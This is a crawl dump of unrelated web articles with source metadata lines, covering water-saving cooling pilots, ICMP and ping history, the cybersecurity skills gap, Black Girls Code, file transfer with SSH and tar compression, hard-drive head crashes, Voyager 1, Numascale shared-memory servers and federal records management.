To that end, May 2012 saw the start of collaboration between Environmental Defense Fund (EDF) and AT&T focused on reducing the amount of water used to keep large buildings cool. Cooling towers, which are often used to help chill large buildings, require large volumes of water - 25 percent of an office building's daily water use on average, but higher in buildings like data centers that have more heat-producing pieces of equipment than people. Together with EDF, we ran a series of pilots across the United States in 2012 to test ways to reduce water used in the cooling process through operational improvements, technical upgrades or switching to free air cooling. In some cases, the pilots didn't produce the results we had expected, but some results were very promising.
During this process, we've learned about the realities of rolling out a water management program and have developed several tools and resources that we've found useful. The fact is that the reduction potential that we've identified is a substantial savings when scaled across AT&T, but it could be a tremendous savings if achieved more broadly. That's why we're making our tools available to all organizations that could benefit from them. Over the course of 2013, EDF and AT&T will be distributing and promoting these tools to those building owners who have the opportunity to reduce water usage and costs. Visit www.edf.org/attwater to find tools that organizations can use to measure and manage their own water use. | <urn:uuid:0bbb486b-b0b1-463a-ab98-5e218e126d66> | CC-MAIN-2017-04 | https://www.att.com/gen/landing-pages?pid=24188 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966229 | 712 | 2.796875 | 3 |
Transmission Control Protocol/Internet Protocol (TCP/IP) is the acronym identifying a suite or stack of protocols developed by the U.S. Department of Defense in the 1970s to support the construction of worldwide internetworks. TCP/IP are the two best-known protocols in the suite.
The TCP/IP stack also includes the Internet Control Message Protocol (ICMP) that is designed to help an administrator manage and control the operation of a TCP/IP network. Every now and then a gateway device, such as a router, or possibly the destination host, will communicate with a source host to report an error in datagram processing. As a tool in the troubleshooting process, ICMP is used.
ICMP is sometimes called an umbrella protocol because it contains many sub-protocols and provides a wide variety of information about a network’s health and operational status. Unique ICMP messages are sent in several situations such as:
- when a datagram cannot reach its destination
- when the gateway does not have the buffering capacity to store and then forward a datagram
- when the gateway can redirect the host to send traffic through a more optimal route
IP is not able to provide reliable delivery on its own; some datagrams may be undelivered without any report of their loss back to the sending device. The higher level protocols that use IP must implement their own reliability procedures if reliable communication is required. For instance, many upper-layer protocols, such as HTTP, require the use of a TCP header containing acknowledged sequence numbers to provide reliable delivery. Other higher-level protocols, such as Trivial File Transfer Protocol (TFTP), contain code that provides reliable delivery by the application itself.
It is important to understand that the purpose of ICMP control messages is to provide feedback about problems in the communication environment, not to make IP reliable. With ICMP, there are still no guarantees that a datagram will be delivered or a control message will be returned. The ICMP messages typically report errors in the processing of datagrams. And, fortunately, to avoid an infinite regress of messages about messages etc., no ICMP messages are sent about ICMP messages.
ICMP, which is documented in RFC 792, is a required protocol that is tightly integrated with IP. ICMP messages, delivered in IP packets, are used for out-of-band messages related to network operation. As a paradox, since ICMP uses IP, ICMP packet delivery is, in itself, considered unreliable. As a result, hosts cannot always count on receiving ICMP packets for all network problems. Some of ICMP’s functions are to:
- Announce network errors
- Announce network congestion
- Assist troubleshooting
- Announce timeouts
One of these functions, Assisting Troubleshooting, is referred to as a ping. ICMP provides an Echo function, which sends a packet on a round-trip between two hosts. The ICMP Ping function transmits a series of packets to a destination device and measures the average round-trip times and computes loss of packet percentages. (As an aside, the ICMP ping function is also commonly referred to as the Packet Internet Groper.)
As some of you may have guessed, ping was named after the pulses of sound made by a sonar device, since its operation is analogous to active sonar in submarines. With a sonar system, an operator issues a pulse of energy toward a target – a ping – which then bounces back from the target and is received by the operator. As the name implies, the pulse of energy in sonar is analogous to a network packet in a ping message.
The ping function was developed in December 1983, as a tool for troubleshooting odd behavior on an IP network. It has been hailed over the years as a critical tool in assisting the diagnosis of Internet connectivity issues. However, the usefulness of ICMP ping was reduced in late 2003. With the growth of the World Wide Web, a group of Internet Service Providers began filtering out ICMP Type 8 Echo request messages at their network boundaries.
Unfortunately, this action was necessary because of the increasing use of ping functionality for target reconnaissance using Internet worms such as Welchia. These worms flood the Internet with ping requests to locate new hosts to infect. Not only did the availability of Ping responses leak information to an attacker, it added to the overall load on networks, which caused problems for routers across the Internet.
In addition, although RFC1122 prescribes that any host must accept an echo-request and issue an echo-reply in return, this is now considered a security risk. Thus, hosts that no longer follow this standard are becoming more prevalent on the public Internet and cannot be pinged.
Author: David Stahl | <urn:uuid:eb4bb3a9-4da5-409f-b51b-f77d84026aa1> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2009/09/30/troubleshooting-with-the-ping-command/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00517-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943442 | 975 | 3.90625 | 4 |
What do the FBI, Trump’s hotel chain, Sony, and JP Morgan Chase all have in common? They are all companies that were hacked in 2014 and 2015, each one a reminder to the rest of us that no one is immune to the threat of criminal hackers. Just this October, a cyber attack disrupted PayPal, Twitter, Spotify, and multiple other websites.
Cyber attacks damage not only a company’s reputation, but also its bottom line. One study suggested the average cost of a data breach in 2015 was $3.8 million. As the costs of data breaches climb, so too does the demand for cyber security experts.
Unfortunately, too many companies are coming up short in their search for skilled professionals to help protect them from cyber attack. A study conducted by Intel Security with the Center for Strategic and International Studies (CSIS) found more than 80% of IT organizations in eight countries face a shortage of workers who specialized in cyber security.
In other words, there is a serious skills gap in cyber security.
Where did this gap come from? Given the short supply of cyber security talent, how can companies find the cyber security skills they need?
The Cybersecurity Skills Gap Leaves Us Vulnerable
“The deficit of cyber security talent is a challenge for every industry sector. The lack of trained personnel exacerbates the already difficult task of managing cyber security risks,” according to the CSIS report.
The current shortage of cyber security skills is concerning for companies in all industries. One in four of the IT professionals surveyed said their organizations had been victims of cyber theft because of their lack of qualified workers.
It is estimated that by 2019, between one to two million cyber security positions will be left unfilled. In the United States alone, 209,000 cyber security positions in 2015 sat vacant because of the shortage of cyber security skills.
Hackers are taking notice of this gap. Worryingly, 33% of respondents to the Intel Security-CSIS survey said their organization was a target for hackers who knew their cyber security was not strong enough.
Origins of the Cybersecurity Gap
With the risks and damages of cyber attacks increasing every year, it stands to reason that we’d see an equal increase in trained professionals ready to combat these attacks. It’s clear that hackers are advancing their skills and methods quickly, so why are we struggling to find skilled cyber security experts?
Numerous factors have led to the skills shortage, but the two most prominent lie in the shortcomings of educational programs and insufficient government policies.
While the United States has many cyber security programs in top universities, this is not enough to overcome the challenges in the education field. It is difficult for IT programs at universities and vocational programs to keep up with the rapid pace of change within the IT field.
As a result, only 23% of IT professionals believe education programs fully prepare cyber security professionals for the industry, says the CSIS report. That’s less than half of trained IT workers who graduate feeling adequately prepared to go up against today’s cyber threats.
The second factor is related to the first. The insufficiencies of our educational programs are in part due to the fact that governments aren’t investing enough in cyber security education. More than three in four IT professionals agreed that their government needs to invest more in building cyber security talent.
Neither have governments crafted sufficient laws and regulations for cyber security. More than half of IT professionals surveyed said the cyber security laws in their country could be improved.
Together, inadequate education and government policy concerning cyber security have helped create the skills gap we see today. Highly technical skills are most in demand, with the following three being most cited: Intrusion detection, secure software development, attack mitigation
“Conventional education and policies can’t meet demand,” declares the Intel Security-CSIS study. “New solutions are needed to build the cyber security workforce necessary in a networked world.”
Fortunately, it’s not hard to see what some of these solutions should be.
Finding Ways To Fill the Gap
Given its severity, it will take real commitment to address the shortage of cyber security skills. Here are a few good places to start.
Education and training solutions
As traditional academic programs fail to impart necessary cyber security skills, workers and employers are addressing the skills gap through unconventional education methods.
As one example, AT&T and Udacity offer a “nanodegree,” which promises to provide “industry credentials for today’s tech job” through courses on information security, building secure servers, and more.
Within academia, current cyber security programs should pivot to provide more hands-on experience and training. A traditional lecture can only go so far in preparing students for working in the cyber security field; real-world experience makes a huge difference. Many companies have already begun incorporating ongoing cyber security education and training into the workplace.
This training is important for staff retention, too. Nearly half of survey participants said a lack of training, or sponsorship for certification programs, were common reasons for employees to leave their organization. The cost of outside training is often too high for employees to pay on their own. Companies who are willing to foot the bill for these costs have an advantage in attracting and retaining cyber security talent.
It’s time for governments to take the skills gap more seriously, and that means investing in cyber security and updating cyber security laws.
According to Intel Security-CSIS, another important step is to collect more national data and standardize the taxonomy for cyber security job functions. Currently, a lack of data makes it difficult to develop targeted cyber security policies and measure their effectiveness.
Relying on outsourcing
Unfortunately for the thousands of companies in need of cyber security skills, there’s no immediate fix. In the long run, government investment and nimbler academic programs are necessary to close the gap in cyber security skills.
These solutions will take time, and until then, many companies are responding to in-house talent shortages by outsourcing cyber security work. More than 60% of survey respondents worked at organizations that outsourced at least some cyber security work. They most often outsourced risk assessment and mitigation, network monitoring and access management, and repair of compromised systems.
For many companies, outsourcing is the only way to get the cyber security skills they desperately need. The skills shortage has driven up the value of in-house cyber security employees, with the median cyber security salary nearly three times the average wage according to the CSIS survey. In the United States, cyber security jobs pay an average of $6,500 more than other IT professions.
Big cyber security spenders -- like the United States government and the financial services industry -- may be able to pay the rates cyber security professionals demand, but other organizations will struggle to do so. For these organizations, outsourcing may be their best option.
In time, academic programs and government policy can catch up to the growing demand for cyber security skills, and it’s essential that nations devote resources to these goals. For now, if companies don’t have the skills they require, third-party cyber security firms offer the best chance at protecting them from the ever-present threat of cyber attack. | <urn:uuid:bdcadfba-ac78-4d88-8eab-0e9c2017d5cb> | CC-MAIN-2017-04 | http://www.cio-today.com/article/index.php?story_id=030002OAXIX0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.955079 | 1,495 | 2.71875 | 3 |
Computer science careers haven’t traditionally been geared toward women or non-white subcultures. Kimberly Bryant is changing that. She founded Black Girls Code, an organization that hosts events in major cities around the U.S. and internationally to teach girls of color about computer programming. Bryant’s goal is to reach 1 million girls between the ages of 7 and 17 by 2040.
“One of the most important things is to plant that seed of interest because [our students] don’t generally have any knowledge of computer programming or computer science before they come into our classes,” she said.
The opportunities provided by Black Girls Code fight against the marginalization of women and minorities in an increasingly technological world, Bryant said — even better, these skills can empower women of color to become technology leaders.
Founded in 2011, the nonprofit gained immediate moral and financial support from individual donors such as Craig Newmark, founder of Craigslist, as well as notable organizations like the Kapor Center for Social Impact. Two years of crowdfunding through Indiegogo has yielded about 3,000 supporters and $130,000.
Donations allow Black Girls Code to run events centered on topics like robotics, game and mobile app development, and Web design. The organization also hosts boot camps for older students where they can work alongside engineers at companies like Twitter and gain first-hand experience of what it’s like to develop real technologies used the world over. | <urn:uuid:fd6d48fc-707a-4036-8ddd-cffce7286b09> | CC-MAIN-2017-04 | http://www.govtech.com/top-25/Kimberly-Bryant-2014-GT-Top-25-Winner.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00059-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952772 | 296 | 3.046875 | 3 |
Once upon a time, data, information, values, and lessons were all communicated by spoken word. Narrative was used to encode and shape data, quality control the transmission of the message, and keep the story alive.
Read more >
That's the simple version. Dr Katherine O'Keefe is an expert in the use of fairy tales and the narrative patterns of folklore in literature. She uses these skills to help data governance clients figure out why their data-driven happy ending hasn't happened yet.
What you will learn:
The links between fairy tales and data management taxonomies
The differences between fairy tales and parables and the narrative patterns that drive good yarns
The link between stories, communication, and change management
How to reinterpret classic narratives to teach valuable data governance lessons. | <urn:uuid:c0e32775-1066-40f9-81f8-533479fb25bb> | CC-MAIN-2017-04 | https://www.brighttalk.com/channel/12405/dama | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929635 | 162 | 2.890625 | 3 |
Therefore, he needs tools that allow him to freely explore and investigate data. Incorporating more data sets in the analysis should be very easy, there should be no need to specify a goal beforehand, and it must be possible to analyze data in an unguided way.
Besides all the more standard features such as displaying data as bar charts, in dashboards, on geographical maps, the perfect tool for this type of work should support at least the following characteristics:
- No advance preparations: There should be no need to predefine data structures of the analysis work in advance. If data is available, it should be possible to load it without any preparations, even if it concerns a new type of data.
- Unguided analysis: Analysts should be able to invoke the analysis technology without having to specify a goal in advance. The exploration technology should allow for analyzing data in an unguided style.
- Self-service: Analysts should be able to use the analysis techniques without help from IT experts.
CXAIR internally organizes all the data using an intelligent index. In fact, internally it's based on text-search technology. This makes it possible to combine and relate data without any form of restriction, which is what analysts need.
Unlike most analysis tools, CXAIR uses search technology that speeds up data analysis. For calculations a mixture of in-memory and on-disk caching is used to analyse massive amounts of data at search engine speeds. All the loaded data resides on the server as it provides a thin client web interface. In other words, no data is loaded on the client machine. Numbers are cached on the server but not text. The fact that CXAIR doesn't cache all the data means that available memory is not a restriction. Cache is used to improve the performance, but large internal memory is not a necessity but will help performance, particularly for ad-hoc calculations.
CXAIR is clearly a representative of a new generation of reporting/analysis tools that users can deploy to freely analyze data. It's a tool for self-service discovery and investigation of data. It's the tool that many data scientists have been waiting for and is worth checking out.
Posted December 10, 2013 6:52 AM
Permalink | 1 Comment | | <urn:uuid:35460a27-009f-458b-ad52-fe551cb18ece> | CC-MAIN-2017-04 | http://www.b-eye-network.com/blogs/vanderlans/archives/2013/12/exploring_and_i.php | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00325-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.907519 | 463 | 2.515625 | 3 |
Network File Transfer With On-the-fly Compression
We often transfer large number and large size files over the network from one computer to another. FTP is the default choice for transferring few files and SCP is the typical choice for transferring large number of files.
If you happen to transfer files from one computer to another over a slow network(such as copying files from home computer to office or vice versa) then the following tip might be helpful. This technique works as follows:
1) Performs on-the-fly compression of files at source computer.
2) Transfer the compressed files over the network.
3) Performs on-the-fly decompression of the files at the target computer.
This technique uses just SSH and TAR commands without creating any temporary files.
Let us assume source computer as HostA and target computer as HostB. We need to transfer a directory (/data/files/) with large number of files from HostA to HostB.
1) Command without on-the-fly compression
Run this command on HostB
# scp -r HostA:/data/files /tmp/
This command recursively copies /data/files directory from HostA to HostB
2) Command with on-the-fly compression
Run this command from on HostB
# ssh HostA “cd /data/;tar zcf – files” | tar zxf –
This command recursively copies /data/files from HostA to HostB a lot faster on slow network.
Let us take a look at this command in detail:
1) ssh HostA “cd /data/;tar zcf – files” | tar zxf – : From HostB connect to HostA via SSH.
2) ssh HostA “cd /data/;tar zcf – files” | tar zxf – : On HostA switch to directory /data/
3) ssh HostA “cd /data/;tar zcf – files” | tar zxf – : Tar ‘files’ directory with compression and send the output to STDOUT.
4) ssh HostA “cd /data/;tar zcf – files” | tar zxf – : Pipe(|) STDOUT from HostA to STDIN of HostB.
5) ssh HostA “cd /data/;tar zcf – files” | tar zxf – : On HostB decompress and untar data coming in through STDIN.
To show how useful this technique is, we transferred 45M worth of files from HostA to HostB over a DSL connection. Here are the results:
1) No compression method: 12min 59 sec
2) On-the-fly compression method: 2min 33 sec
This method will be effective with uncompressed large files or directories with a mix of different files. If the transferred files are already compressed then this method won’t be effective. | <urn:uuid:5d6396eb-ae72-401e-99b5-1c14af980e6a> | CC-MAIN-2017-04 | https://www.getfilecloud.com/blog/network-file-transfer-with-on-the-fly-compression/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00325-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.781516 | 621 | 3.125 | 3 |
One important question clients ask when considering data recovery is: “How likely will a successful data recovery be?”
For us, the answer depends mostly on whether or not the data still exists. That seems obvious in hindsight.
But First, How Is the Data Stored?
The data on a hard drive is stored on one or more hard discs, or platters, made of glass or aluminum. These platters are coated with an extremely thin mirror-like coating of magnetic material. This surface has tiny individual areas, each of which has two possible states.
The state is changed by the hard drive’s read/write heads when a small electrical field is applied, creating an incredibly dense matrix of magnetized or unmagnetized spots — 1’s and 0’s. That’s your data. On a basic level, this data is stored using electromagnetism.
The magnetic material on the platters is delicate. Under normal operation, the read/write heads are positioned over the platter by an arm (picture the arm on a record player), but they move quickly across the platter without contacting the platter surface.
Instead, they float on an extremely thin — as in 3-5 nanometers — cushion of air. To give a sense of scale, an oxygen molecule is about a third of a nanometer.
When the hard drive spins up, the motion of the platters creates airflow. The read/write head assembly is designed roughly like a small wing and the airflow generated inside the drive lifts the heads off the platter. So I guess indirectly, we can thank the Wright Bros. for their help in developing modern hard drives (and we can directly thank IBM for inventing the first hard drive in 1956).
When Worlds Collide (and Heads Crash)
In some situations, the read/write head loses lift and crashes onto the platter surface. This action is commonly referred to as a head crash. In most situations, the head will briefly make contact, immediately lift back up, and the drive will go on working with no noticeable impact to the user.
Unfortunately, sometimes a head crash damages the head. Instead of lifting back up, the heads may remain in contact with the delicate platter surface.
The platter spins at some constant, high rotational speed. A common rotational speed is 7,200 revolutions per minute, but drives range from 5,400 to15,000 rpm. This rotational velocity combined with contact from the heads is what causes rotational scoring.
When that magnetic material gets scored, the magnetic coating is turned to dust. The data it carried is lost. All those 1’s and 0’s, all that potentially precious information, gone forever.
In extreme cases of rotational scoring, we have seen large portions of laptop hard drive platters exposed as bare glass. This means that nearly all the magnetic material from a vast portion of the drive has been scratched off by the read/write head.
Some minor rotational scoring can be overcome by advanced techniques to recover data elsewhere on the drive’s platters. Unfortunately, any significant scoring is very likely to remove key parts of metadata necessary to make sense of the remaining binary code.
Rotational scoring also creates an uneven surface on the platter, meaning even if you replace a damaged read/write head, the new one can become damaged again by slamming into the uneven portions of the platter. Fortunately, our handy-dandy (and state-of-the-art) burnishing machine can help mitigate this problem.
In summary, if your hard drive experiences some rotational scoring, it might not be the end of the world. The data may still be recoverable, in which case please feel free to get in touch with us.
Just try not to move, kick, or drop a hard drive while it’s operating and you’ve greatly improved your chances of avoiding rotational scoring. | <urn:uuid:c5f80d01-91e8-4a1a-ab17-88f6fe82f43b> | CC-MAIN-2017-04 | https://www.gillware.com/blog/data-recovery/barriers-to-hard-drive-data-recovery-rotational-scoring/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00445-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921289 | 816 | 3.328125 | 3 |
England – University of Southampton researches have been able to produce fiber optic fibers that are capable of data transfer at 99.7% the speed of light as we know it. What kind of data transfer speeds does that equate too? Well roughly 10 Terabytes per second. To put that into perspective, todays current fiber optic speeds are only roughly 40 gigabit per second. With such a dramatic increase, I wonder when I would be able to get this installed at my house. Haha.
How did the researches make this a reality, well their fiber optics are hollow and filled with air. This makes these fibers really fragile and difficult to bend or go around corners. To solve this problem they used a photonic-bandgap rim on the inside of the fiber which enables low loss, and little latency. Currently the researches expect that this will not replace standard fiber anytime soon but for small datacenter applications it would provide an incredible speed boost. | <urn:uuid:14755750-88c6-4a11-86b4-0be0fa0931a1> | CC-MAIN-2017-04 | http://www.bvainc.com/fiber-network-that-operates-at-99-7-speed-of-light-impressive/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00279-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960412 | 193 | 3.15625 | 3 |
Callbacks are extremely commonplace in computer programming. I'm kinda
shocked at seeing not one but multiple people in this thread saying that
they don't even know what a callback is.
Exit programs are an example of a callback. You give the system the name
of a program, and it calls it at a particular time.
Triggers are another.
The %HANDLER routines used by XML-SAX or XML-INTO are callbacks.
APIs like Qp0lProcessSubtree(), QaneSava, QaneRsta use callbacks.
they are utterly ubiquitous, you can't sneeze without using a callback
You should definitely take the time to learn about them.
On 10/15/2012 3:50 PM, Richard Reeve wrote:
Has anyone ever heard of a callback as it is related to the IBM i? I was asked to explain a callback during an interview and I'd never even heard of it. Can any of you explain to me what a callback is and how it is used? I tried google but didn't get a good explanation. | <urn:uuid:112abd58-5b28-4280-a90c-f28497187267> | CC-MAIN-2017-04 | http://archive.midrange.com/midrange-l/201210/msg00640.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00400-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949451 | 231 | 2.65625 | 3 |
NASA's Voyager 1 has journeyed farther from Earth than any other man-made object, but there's a debate about exactly how far it's gone and whether it's actually left our solar system.
NASA's Voyager 1 has journeyed farther from Earth than any other man-made object, but there's a debate about exactly how far it's traveled and whether it's actually left our solar system.
In June, NASA reported that the 36-year-old Voyager, which launched on Sep. 5, 1977 to study the outer Solar System and interstellar space, had traveled more than 11 billion miles from the sun and was nearing the edge of the solar system and interstellar space.
However, a team of researchers from the University of Maryland yesterday reported that the spacecraft has already left the solar system and entered interstellar space - or the space between star systems in a galaxy. "It's a somewhat controversial view, but we think Voyager has finally left the Solar System, and is truly beginning its travels through the Milky Way," said Marc Swisdak, a research scientist at the University of Maryland.
Voyager 1, according to university researchers, has begun the first exploration of our galaxy beyond the Sun's influence.
The scientists have created a model of the outer edge of our solar system and say the data coming back from Voyager fits what they would expect to see in that model.
NASA officials could not be reached for comment.
However, less than two months ago, NASA said Voyager 1 was believed to be near the edge of the heliosphere, which basically is a bubble around the sun. The spacecraft is so close to the edge of the solar system that it now is sending back more information about charged particles from outside the solar system and less from those inside it, according to the space agency.
"This strange, last region before interstellar space is coming into focus, thanks to Voyager 1, humankind's most distant scout," Ed Stone, Voyager's project scientist at the California Institute of Technology, said in an earlier statement. "If you looked at the cosmic ray and energetic particle data in isolation, you might think Voyager had reached interstellar space, but the team feels Voyager 1 has not yet gotten there because we are still within the domain of the sun's magnetic field."
NASA noted that its scientists don't know exactly how far Voyager 1 needs to travel to enter interstellar space. It could take a few months or even years.
Researchers from the University of Maryland, however, say they believe Voyager left our solar system a little more than a year ago.
The issue revolves around how scientists detect the edge of our solar system. The university noted the conventional view is that that scientists will know it's passed through this mysterious boundary when Voyager stops seeing solar particles and starts seeing galactic particles, along with a change in the prevailing direction of the local magnetic field.
Researchers say that NASA isn't taking into consideration that the border of the heliosphere is very uneven and magnetic field lines become confusing and variable when the magnetic fields of the sun and of interstellar space connect.
Part of Voyager 1's mission is to measure the size of the heliosphere.
Scientists are eager to see what the spacecraft will find in interstellar space, which is believed to be filled with star particles.
Voyager 1 launched with its twin spacecraft, Voyager 2. Both have flown past Jupiter, Saturn, Uranus and Neptune. In 1990, they embarked on a mission to enter the interstellar region. Voyager 2 is currently just 9 billion miles away from the sun, according to NASA.
Scientists are debating whether Voyager 1 has entered interstellar space or is still in our solar system. (Image: NASA)
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "Voyager 1, where are you?" was originally published by Computerworld. | <urn:uuid:541a0771-f963-474a-a002-45f2904d852b> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2170017/data-center/voyager-1--where-are-you-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944619 | 843 | 3.765625 | 4 |
Current computer architectures have developed along two different branches, one with distributed memory with separate address domains for each node with message passing programming model and another with global shared memory with a common physical address domain for the whole system. The first category is present in massively parallel processors (MPPs) and clusters and the latter is present in the common servers, workstations, personal computers and symmetrical multiprocessing systems (SMPs) through multicore and multi-socket implementations. These two architectures represent distinctly different programming paradigms. The first one (MPP) requires programs that are explicitly written for message passing between processes where each process only has access to its local data. The second category (SMP) can be programmed by multithreading techniques with global access to all data from all processes and processors. The latter represents a simpler model that requires less code and it is also fully equivalent with the architecture and programming model in common workstations and personal computers used by all programmers every day.
Since clusters are composed of general purpose multicore/multisocket processing nodes, these represent a form of a hybrid of the two different architectures described above.
Numascale’s approach to scalable shared memory
Numascale’s NumaConnect extends the SMP programming model to be scaled up by connecting a larger amount of standard servers (up to 4096 with the current implementation) as one global shared memory system (GSM). Such a system provides the same easy-to-use environment as a common workstation, but with the added capacity of a very large shared physical address space and I/O all controlled by a single image operating system. This means that programmers can enjoy the same working environment as their favorite workstation and system administrators have only one system to relate to instead of a bunch of individual nodes found in a cluster. Besides, the SMP model also allows efficient execution of message passing (MPI) programs by using shared memory as communication channel between processes.
Distributed vs shared memory
In distributed memory systems (clusters and MPPs), the different processors residing on different nodes in the system have no direct access to each other’s memories (or I/O space). Data on a different node cannot be referenced directly by the programmer through a variable name like it can in a shared memory architecture. This means that data to be shared or communicated between those processes must be accessed through explisit programming by sending the data over a network. This is normally done through calls to a message passing library (like MPI) that invokes a software driver to perform the data transfer. The data to be sent was (most probably) produced by the sending process and such it resides in one of the caches belonging to the processor that runs the process. This will normally be the case since most MPI programs tend to communicate through relatively short messages in the order of a few bytes per message. The communication library will need to copy the data to a system send buffer and call the routine to setup a DMA transfer by the network adapter that in turn will request the data from memory and transfer it to a buffer on the receiving node. All-in all this requires a number of transactions across system datapaths as depicted in figure Figure 1.
Figure 1, Message passing with traditional network technology, showing sending side only
In a shared memory machine, referencing any variable anywhere in the entire dataset is accomplished though a single standard load register instruction. For the programmer, this is utterly simple compared to the task of writing the explisit MPI calls necessary to perform the same task.
The same operation for sending data in the case of running a message passing (MPI) program on a shared memory system only requires the sender to execute a single store instruction (preferably a non-polluting store instruction to avoid local cache pollution) to send up to 16 bytes (this is the maximum amount of data for a single instruction store in the x86 instruction set as of today). The data will be sent to an address that is pointing to the right location in the memory of the remote node as indicated in figure Figure 2.
Figure 2, Message Passing with shared memory, both sender and receiver shown
Numascale’s technology is applicable for applications with requirements for memory and processors that exceed the amount available in a single commodity unit. Applications for servers that can benefit from NumaConnect span from HPC applications with requirements for 10-20TBytes of main memory for seismic data processing with advanced algorithms through applications in life sciences to Big Data analytics.
Numa systems are available from system integrators world-wide based on the IBMx3755 server system and Supermicro 1042 or 2042 servers. Numascale operates a demo system where potential customers can run their tests. See Numascale website http://numascale.com for details, the request form for access to the demo system is http://numascale.com/numa_access.php. | <urn:uuid:996290e2-efe2-4f83-a7c2-90ab66984a8a> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/08/19/numascale_delivers_shared_memory_systems_at_cluster_price_with_virtually_unlimited_number_of_cores_and_memory/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00308-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.924885 | 1,010 | 2.78125 | 3 |
Why its Crucial to Start Unifying Physical and Electronic Records Now
Unifying the record management process is not just about indexing and filing records in a legally compliant fashion. Instead, agencies know it also involves facilitating the ability to locate and review information in order to make faster, more efficient decisions. In turn, agencies recognize that a solid management process empowers them to achieve their goals.
Federal agencies have reached an information management ‘tipping point.’ The Presidential Directive on Managing Government Records, in addition to the ‘Freeze the Footprint’ mandate, FOIA and information-centered initiatives such as the Open Data Policy, have provided federal organizations with a new set of challenging guidelines for putting records in order.
These mandates — combined with the explosive growth of electronic records — are driving federal agencies to seek solutions that can unify the management of both physical and electronic documents. According to industry research, the amount of data being created and stored by organizations is doubling every two years, despite having already reached staggering proportions.1 In today’s day and age, humans are creating as much data every ten minutes as was amassed by all of mankind from the beginning of recorded time through to 2003.2
For many organizations, the challenges of information management seem overwhelming. Federal agencies are trying to balance ever-expanding record volumes against flat or shrinking budgets, while simultaneously racing to meet mandates that require a fundamental shift in how information is stored, accessed and managed. There is also an understanding that unifying the record management process is not just about indexing and filing records in a legally compliant fashion. Instead, agencies know it also involves facilitating the ability to locate and review information in order to make faster, more efficient decisions. In turn, they recognize that a solid management process empowers them to achieve their goals.
At the same time, most government organizations also fully understand that digitizing everything is neither fiscally responsible nor practically viable. They realize that managing both paper and digital records in a unified framework makes the most sense, from both a fundamental and an economic perspective. Agencies therefore know that marrying these two types of records under a single information governance plan is crucial to meeting federally mandated goals.
Federal records and information management
Fewer than 1 in 5 federal records management professionals say they are completely prepared to handle the growing volume, velocity and variety of federal records.
A majority of those surveyed also cited a need for more training and budgetary dollars to help agencies meet federally-mandated records management objectives.
92% of respondents believe their agency must take further steps to meet the Presidential Directive deadlines.
46% Despite the advantages of the Presidential Directive, nearly half (46%) either do not believe or are unsure if the deadlines are realistic or obtainable.5
Such a unified approach can allow organizations to apply consistent policy management and enforcement to all records agency-wide, no matter where these records may be located, what format they may take or how they were initially created. According to agency respondents surveyed in NARA’s latest self-assessment report, policy enforcement could indeed be made easier if all records were combined under a single set of procedures and a streamlined management oversight system.3
Although federal agencies are now required to get their records management processes under control, fewer than 1 in 5 records management professionals surveyed in late 2013 reported being completely prepared to handle the growing volume, velocity and variety of federal records. Instead, according to the results of a MeriTalk survey of 100 federal records and information management professionals, almost half (46%) of respondents were either unsure of or did not believe in their ability to see the Presidential Directive goals as realistic or obtainable. Not surprisingly, a majority of those surveyed also cited a need for more training and budgetary dollars to help agencies meet federally mandated records management objectives.4
Major Deadlines Within the Presidential Directive on Managing Government Records
All records must be inventoried to ensure permanent records more than 30 years old are reported to NARA, and all unscheduled records stored at NARA must be identified as well.
Plans must be developed and implemented to transition necessary permanent records to digital formats.
Records Management (RM) training must be established to inform employees of the new responsibilities, policies and laws.
Enterprise content management plans must be built out to ensure electronic transfer to NARA’s Electronic Records Archives (ERA) when ready.
Both permanent and temporary email records must be managed in an accessible electronic format.
All electronic permanent records must be stored/managed in electronic format.
Ongoing requirements call for RM to be incorporated into cloud strategies and solutions at some point in the future.
Digital records growth:
One big challenge agencies face in unifying information management is coming to terms with the rapid growth of electronic records. If such records are not tagged properly, they multiply and continue to create headaches, particularly when there is a FOIA or e-Discovery request in place or if some other regulatory compliance practice is required.
Understanding the impact of social media:
